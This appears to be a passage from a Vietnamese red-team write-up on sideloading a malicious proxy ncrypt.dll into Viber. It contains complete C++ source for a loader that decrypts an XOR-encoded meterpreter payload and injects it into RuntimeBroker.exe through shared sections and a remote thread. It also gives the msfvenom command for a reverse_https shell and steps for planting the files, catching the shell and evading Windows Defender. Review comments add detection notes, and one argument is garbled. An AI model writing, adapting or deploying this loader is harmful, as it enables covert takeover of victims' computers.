#pragma comment(linker, "/export:NCryptUnprotectSecret=ncrypts.NCryptUnprotectSecret,@102")
#pragma comment(linker, "/export:NCryptVerifyClaim=ncrypts.NCryptVerifyClaim,@103")
#pragma comment(linker, "/export:NCryptVerifySignature=ncrypts.NCryptVerifySignature,@104")
#pragma comment(linker, "/export:SslChangeNotify=ncrypts.SslChangeNotify,@105")
#pragma comment(linker, "/export:SslComputeClientAuthHash=ncrypts.SslComputeClientAuthHash,@106")
#pragma comment(linker, "/export:SslComputeEapKeyBlock=ncrypts.SslComputeEapKeyBlock,@107")
#pragma comment(linker, "/export:SslComputeFinishedHash=ncrypts.SslComputeFinishedHash,@108")
#pragma comment(linker, "/export:SslComputeSessionHash=ncrypts.SslComputeSessionHash,@109")
#pragma comment(linker, "/export:SslCreateClientAuthHash=ncrypts.SslCreateClientAuthHash,@110")
#pragma comment(linker, "/export:SslCreateEphemeralKey=ncrypts.SslCreateEphemeralKey,@111")
#pragma comment(linker, "/export:SslCreateHandshakeHash=ncrypts.SslCreateHandshakeHash,@112")
#pragma comment(linker, "/export:SslDecrementProviderReferenceCount=ncrypts.SslDecrementProviderReferenceCount,@113")
#pragma comment(linker, "/export:SslDecryptPacket=ncrypts.SslDecryptPacket,@114")
#pragma comment(linker, "/export:SslDeriveSessionTicketKey=ncrypts.SslDeriveSessionTicketKey,@115")
#pragma comment(linker, "/export:SslDuplicateTranscriptHash=ncrypts.SslDuplicateTranscriptHash,@116")
#pragma comment(linker, "/export:SslEncryptPacket=ncrypts.SslEncryptPacket,@117")
#pragma comment(linker, "/export:SslEnumCipherSuites=ncrypts.SslEnumCipherSuites,@118")
#pragma comment(linker, "/export:SslEnumCipherSuitesEx=ncrypts.SslEnumCipherSuitesEx,@119")
#pragma comment(linker, "/export:SslEnumEccCurves=ncrypts.SslEnumEccCurves,@120")
#pragma comment(linker, "/export:SslEnumProtocolProviders=ncrypts.SslEnumProtocolProviders,@121")
#pragma comment(linker, "/export:SslExpandBinderKey=ncrypts.SslExpandBinderKey,@122")
#pragma comment(linker, "/export:SslExpandExporterMasterKey=ncrypts.SslExpandExporterMasterKey,@123")
#pragma comment(linker, "/export:SslExpandNextGenTrafficKey=ncrypts.SslExpandNextGenTrafficKey,@124")
#pragma comment(linker, "/export:SslExpandPreSharedKey=ncrypts.SslExpandPreSharedKey,@125")
#pragma comment(linker, "/export:SslExpandResumptionMasterKey=ncrypts.SslExpandResumptionMasterKey,@126")
#pragma comment(linker, "/export:SslExpandTrafficKeys=ncrypts.SslExpandTrafficKeys,@127")
#pragma comment(linker, "/export:SslExpandWriteKey=ncrypts.SslExpandWriteKey,@128")
#pragma comment(linker, "/export:SslExportKey=ncrypts.SslExportKey,@129")
#pragma comment(linker, "/export:SslExportKeyingMaterial=ncrypts.SslExportKeyingMaterial,@130")
#pragma comment(linker, "/export:SslExtractEarlyKey=ncrypts.SslExtractEarlyKey,@131")
#pragma comment(linker, "/export:SslExtractHandshakeKey=ncrypts.SslExtractHandshakeKey,@132")
#pragma comment(linker, "/export:SslExtractMasterKey=ncrypts.SslExtractMasterKey,@133")
#pragma comment(linker, "/export:SslFreeBuffer=ncrypts.SslFreeBuffer,@134")
#pragma comment(linker, "/export:SslFreeObject=ncrypts.SslFreeObject,@135")
#pragma comment(linker, "/export:SslGenerateMasterKey=ncrypts.SslGenerateMasterKey,@136")
#pragma comment(linker, "/export:SslGeneratePreMasterKey=ncrypts.SslGeneratePreMasterKey,@137")
#pragma comment(linker, "/export:SslGenerateSessionKeys=ncrypts.SslGenerateSessionKeys,@138")
#pragma comment(linker, "/export:SslGetCipherSuitePRFHashAlgorithm=ncrypts.SslGetCipherSuitePRFHashAlgorithm,@139")
#pragma comment(linker, "/export:SslGetKeyProperty=ncrypts.SslGetKeyProperty,@140")
#pragma comment(linker, "/export:SslGetProviderProperty=ncrypts.SslGetProviderProperty,@141")
#pragma comment(linker, "/export:SslGetSessionTicketProtectionHeaderSize=ncrypts.SslGetSessionTicketProtectionHeaderSize,@142")
#pragma comment(linker, "/export:SslHashHandshake=ncrypts.SslHashHandshake,@143")
#pragma comment(linker, "/export:SslImportKey=ncrypts.SslImportKey,@144")
#pragma comment(linker, "/export:SslImportMasterKey=ncrypts.SslImportMasterKey,@145")
#pragma comment(linker, "/export:SslIncrementProviderReferenceCount=ncrypts.SslIncrementProviderReferenceCount,@146")
#pragma comment(linker, "/export:SslLookupCipherLengths=ncrypts.SslLookupCipherLengths,@147")
#pragma comment(linker, "/export:SslLookupCipherSuiteInfo=ncrypts.SslLookupCipherSuiteInfo,@148")
#pragma comment(linker, "/export:SslOpenPrivateKey=ncrypts.SslOpenPrivateKey,@149")
#pragma comment(linker, "/export:SslOpenProvider=ncrypts.SslOpenProvider,@150")
#pragma comment(linker, "/export:SslProtectSessionTicket=ncrypts.SslProtectSessionTicket,@151")
#pragma comment(linker, "/export:SslSignHash=ncrypts.SslSignHash,@152")
#pragma comment(linker, "/export:SslUnprotectSessionTicket=ncrypts.SslUnprotectSessionTicket,@153")
#pragma comment(linker, "/export:SslVerifySignature=ncrypts.SslVerifySignature,@154")
// All credits to https://github.com/peperunas/injectopi/blob/master/CreateSection/CreateSection.cpp
// and https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/#Modification-of-Versiondll
// Resolve the native ntdll entry points that DoMagic drives, by name, from the
// already loaded ntdll.dll, and store them in the file-scope function pointers
// declared outside this listing (ZwOpenProcess, ZwCreateSection,
// NtMapViewOfSection, ZwCreateThreadEx, NtDelayExecution, ZwClose).
//
// Returns TRUE when all six exports resolved, FALSE at the first one that
// GetProcAddress cannot find (pointers resolved before that stay assigned,
// later ones are left untouched).
//
// NOTE(review): GetModuleHandleA's result is not checked. A NULL module would
// only show up indirectly, as GetProcAddress returning NULL and thus FALSE.
// NOTE(review): this string-based resolution of six Zw*/Nt* names is the
// same call chain the numbered step comments in DoMagic describe; for a
// detection engineer it is the import pattern worth keying on, independent
// of the DLL-proxy wrapper around it.
BOOL LoadNtdllFunctions() {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    ZwOpenProcess = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PCLIENT_ID))GetProcAddress(ntdll, "ZwOpenProcess");
    if (ZwOpenProcess == NULL) return FALSE;
    ZwCreateSection = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE))
        GetProcAddress(ntdll, "ZwCreateSection");
    if (ZwCreateSection == NULL) return FALSE;
    NtMapViewOfSection = (NTSTATUS(NTAPI*)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG))
        GetProcAddress(ntdll, "NtMapViewOfSection");
    if (NtMapViewOfSection == NULL) return FALSE;
    ZwCreateThreadEx = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, ULONG_PTR, SIZE_T, SIZE_T, PVOID))
        GetProcAddress(ntdll, "ZwCreateThreadEx");
    if (ZwCreateThreadEx == NULL) return FALSE;
    // Alertable flag + relative interval; used for the two ~4.27 s delays in DoMagic.
    NtDelayExecution = (NTSTATUS(NTAPI*)(BOOL, PLARGE_INTEGER))GetProcAddress(ntdll, "NtDelayExecution");
    if (NtDelayExecution == NULL) return FALSE;
    ZwClose = (NTSTATUS(NTAPI*)(HANDLE))GetProcAddress(ntdll, "ZwClose");
    if (ZwClose == NULL) return FALSE;
    return TRUE;
}
// Walk a Toolhelp process snapshot and return a PROCESS_ALL_ACCESS handle to
// the first process whose image name equals procName exactly. The comparison
// is strcmp, so it is case-sensitive and assumes a non-UNICODE build in which
// PROCESSENTRY32::szExeFile is a char array. A process that matches but cannot
// be opened is skipped and the walk continues. Returns NULL when no match
// could be opened.
//
// Precondition: LoadNtdllFunctions() has run, because ZwOpenProcess and
// ZwClose are the function pointers it fills in (DoMagic calls it first).
//
// NOTE(review): the snapshot handle is only closed on the not-found path; the
// early `return hProc` on a successful open leaks it for the life of the host.
// NOTE(review): CreateToolhelp32Snapshot's return is not checked against
// INVALID_HANDLE_VALUE before Process32First.
// NOTE(review): `NTSTATUS status = NULL` initialises an integer with the null
// pointer constant; 0 is what is meant.
HANDLE getProcHandlebyName(const char* procName) {
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);
    NTSTATUS status = NULL;
    HANDLE hProc = 0;
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (Process32First(snapshot, &entry)) {
        do {
            if (strcmp((entry.szExeFile), procName) == 0) {
                OBJECT_ATTRIBUTES oa;
                // CLIENT_ID.UniqueProcess carries the PID; UniqueThread is left NULL.
                CLIENT_ID cid = { (HANDLE)entry.th32ProcessID, NULL };
                InitializeObjectAttributes(&oa, nullptr, 0, nullptr, nullptr);
                // 3. Call the Windows API ntdll ZwOpenProcess using the process ID from step 1. The process is opened with full control access.
                status = ZwOpenProcess(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);
                if (!NT_SUCCESS(status)) {
                    // `continue` jumps to the while condition: try the next entry with the same name.
                    continue;
                }
                return hProc;
            }
        } while (Process32Next(snapshot, &entry));
    }
    ZwClose(snapshot);
    return NULL;
}
// credit: Sektor7 RTO Malware Essential Course
//
// XOR `data` in place with a repeating key. The key index wraps when it
// reaches key_len - 1, so only the first key_len - 1 bytes of `key` take
// part. The caller in this file passes sizeof() of a string literal, which
// counts the trailing NUL, so the effective cycle is strlen(key) and the
// NUL byte itself is never applied. Passing strlen(key) instead would
// silently drop the last key byte from the cycle. key_len must be >= 1;
// data_len may be 0 (no-op). Applying the same call twice restores `data`.
void XOR(char* data, size_t data_len, char* key, size_t key_len) {
    size_t key_pos = 0;
    char* end = data + data_len;
    for (char* cur = data; cur < end; ++cur) {
        if (key_pos == key_len - 1) {
            key_pos = 0;
        }
        *cur ^= key[key_pos++];
    }
}
// Thread body started from DllMain. Reads the XOR-encrypted payload from disk,
// decrypts it, and runs it inside RuntimeBroker.exe via a shared section
// (mapped read/write locally, read/write/execute remotely) and a remote
// thread. The numbered step comments follow the Unit42 Brute Ratel write-up
// credited above; that sequence (ZwOpenProcess -> ZwCreateSection ->
// NtMapViewOfSection x2 -> NtDelayExecution -> ZwCreateThreadEx) is the
// observable a detection engineer should model, not the proxy-DLL shell.
//
// lpParameter is unused. Returns 0 on success and -1 (i.e. 0xFFFFFFFF as a
// DWORD) on failure. A missing target process does not return at all: it
// calls exit(0), which terminates the host application that sideloaded us.
//
// NOTE(review): fopen, malloc and fread results are unchecked; a missing
// viber.bin dereferences a NULL FILE* at fseek. The `shellcode` buffer and
// the hProc / hSection / hThread handles are never released.
// NOTE(review): printf output only goes somewhere if the host has a console;
// the silent `return -1` paths give no signal at all.
DWORD WINAPI DoMagic(LPVOID lpParameter)
{
    if (LoadNtdllFunctions() == FALSE) {
        printf("[-] Failed to load NTDLL function\n");
        return -1;
    }
    // 1. Enumerate all process and locate process for RuntimeBroker.exe
    // https://stackoverflow.com/questions/865152/how-can-i-get-a-process-handle-by-its-name-in-c
    HANDLE hProc = getProcHandlebyName("RuntimeBroker.exe");
    if (hProc == NULL) {
        // NOTE(review): exit() from a worker thread tears down the whole host process.
        exit(0);
    }
    // 2. Read the payload file viber.bin from the current working directory.
    // Generated with (the published command writes `f raw` without the dash and repeats exitfunc=thread):
    // msfvenom -p windows/x64/meterpreter/reverse_https lhost=<ip> lport=<port> -f raw -o viber.bin exitfunc=thread --encrypt xor --encrypt-key "jikoewarfkmzsdlhfnuiwaejrpaw"
    FILE* fp;
    size_t shellcodeSize;
    unsigned char* shellcode;
    fp = fopen("viber.bin", "rb");
    // Size by seeking to the end; ftell's -1 error value is not checked.
    fseek(fp, 0, SEEK_END);
    shellcodeSize = ftell(fp);
    fseek(fp, 0, SEEK_SET);
    shellcode = (unsigned char*)malloc(shellcodeSize);
    fread(shellcode, shellcodeSize, 1, fp);
    // sizeof(key) is 29 (28 characters + NUL). XOR() wraps at key_len - 1, so
    // the effective cycle is the 28-byte key msfvenom used; the NUL is never applied.
    char key[] = "jikoewarfkmzsdlhfnuiwaejrpaw";
    // 4. Decrypt the payload file using the XOR encryption algorithm with a 28-byte key of: jikoewarfkmzsdlhfnuiwaejrpaw
    XOR((char*)shellcode, shellcodeSize, key, sizeof(key));
    HANDLE hSection = NULL;
    NTSTATUS status = NULL;
    // Section and both views are a fixed 4096 bytes. `size` is also the in/out
    // ViewSize for both NtMapViewOfSection calls below.
    // NOTE(review): the memcpy further down copies shellcodeSize bytes with no
    // check against `size`; a payload larger than 4096 bytes writes past the
    // local view.
    SIZE_T size = 4096;
    // Brace-initialises the first member (LowPart); HighPart is zero.
    LARGE_INTEGER sectionSize = { size };
    PVOID pLocalView = NULL, pRemoteView = NULL;
    // NOTE(review): sizeof a pointer (not the payload); unused from here on.
    SIZE_T scLength = sizeof(shellcode);
    // SECTION_INHERIT: 2 == ViewUnmap (child processes do not inherit the view).
    int viewUnMap = 2;
    // 5. Call the Windows API NtCreateSection, which creates a block of memory that can be shared between processes.
    // NOTE(review): "§ionSize" is an extraction artefact - "&sect" was rendered
    // as "§" - the intended argument is &sectionSize.
    if ((status = ZwCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
        return -1;
    }
    // 6. Two calls into the Windows API NtMapViewOfSection. The first call maps the contents of the decrypted payload into the current process memory space.
    // Local view is PAGE_READWRITE only: this process writes the bytes, it never executes them.
    if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(),
        &pLocalView, NULL, NULL, NULL,
        &size, viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
        return -1;
    }
    // Use for in-file shellcode
    // (only valid if `shellcode` is changed to an array; with the pointer
    // declared above sizeof(shellcode) is 8)
    //memcpy(pLocalView, shellcode, sizeof(shellcode));
    // Use for on-disk shellcode
    memcpy(pLocalView, shellcode, shellcodeSize);
    // 6. Second call maps the contents into the Runtimebroker.exe memory space.
    // Same section, so the remote view already holds the decrypted bytes; it is
    // mapped PAGE_EXECUTE_READWRITE - an RWX section view in RuntimeBroker is
    // the memory artefact to look for.
    if ((status = NtMapViewOfSection(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
        &size, viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
        return -1;
    }
    // 7. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
    // Negative QuadPart = relative interval in 100 ns units: 4270 * 10000 = 4.27 s.
    // The wait is alertable (first argument TRUE); if it is cut short by an
    // APC the status is not STATUS_SUCCESS and this function gives up.
    LARGE_INTEGER interval;
    interval.QuadPart = -1 * (int)(4270 * 10000.0f);
    if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
        printf("[-] Cannot delay execution. Error code: %08X\n", status);
        return -1;
    }
    // 8. Call the Windows API NtCreateThreadEx.
    // 0x1FFFFF is THREAD_ALL_ACCESS. The thread starts at the remote view
    // address, suspended, and is released by ResumeThread (return value ignored).
    HANDLE hThread = NULL;
    if ((status = ZwCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProc, pRemoteView, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS) {
        return -1;
    }
    ResumeThread(hThread);
    // 9. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
    interval.QuadPart = -1 * (int)(4270 * 10000.0f);
    if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
        printf("[-] Cannot delay execution. Error code: %08X\n", status);
        return -1;
    }
    // 10. Finished.
    return 0;
}
// DLL entry point. On DLL_PROCESS_ATTACH it starts DoMagic on a fresh thread,
// so the injection runs after DllMain returns rather than on the loader's
// thread, and immediately drops the thread handle. Thread attach/detach are
// no-ops; DLL_PROCESS_DETACH sleeps 5 s before returning.
//
// NOTE(review): the DLL_PROCESS_ATTACH case has no `break`, so it falls
// through into DLL_THREAD_ATTACH. That case only breaks, so the effect is nil
// today, but add a break (or mark the fallthrough) before more code lands there.
// NOTE(review): CreateThread's result is not checked; on failure this becomes
// CloseHandle(NULL), which fails quietly and the payload never runs.
// NOTE(review): Microsoft's DllMain guidance discourages creating threads and
// blocking (the Sleep on detach) while the loader lock is held - presumably
// deliberate here, but it is where a host-application hang would come from.
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    HANDLE threadHandle;
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // https://gist.github.com/securitytube/c956348435cc90b8e1f7
        // Create a thread and close the handle as we do not want to use it to wait for it
        threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
        CloseHandle(threadHandle);
        // (falls through - see note above)
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        Sleep(5000);
        break;
    }
    return TRUE;
}
Mình nghĩ là hoàn toàn có thể ghi luôn shellcode vào trong code trên, tuy nhiên để tiện thì mình cứ để như này luôn, cũng như sẽ không sử dụng vmprotect.
Compile và ra được file ncrypt.dll cần dùng.
Giờ thì tổng cộng chúng ta có 3 file:
viber.bin: shellcode meterpreter đã được XOR bằng msfvenom (ncrypt.dll sẽ đọc và giải mã file này lúc chạy)
ncrypts.dll: file ncrypt.dll gốc đã đổi tên; mọi export của dll giả được forward sang đây qua các #pragma comment(linker, "/export:...") ở trên
ncrypt.dll: file dll sideload, vừa forward các function sang ncrypts.dll vừa load shellcode
Dựa trên kết quả của procmon, ta sẽ copy cả 3 file này vào C:\Users\Detec\AppData\Local\Viber:
Set up listener:
Do khi test là máy ảo nên user sẽ là TrungPQ6
Khi chạy Viber, ta thấy cả 2 file dll đều đã được load thành công
Metasploit đã nhận được meterpreter reverse shell.
Windows Defender cũng không bắt được gì (kết quả tại thời điểm test; signature và behaviour detection của Defender được cập nhật liên tục, nên không nên coi đây là kết quả cố định).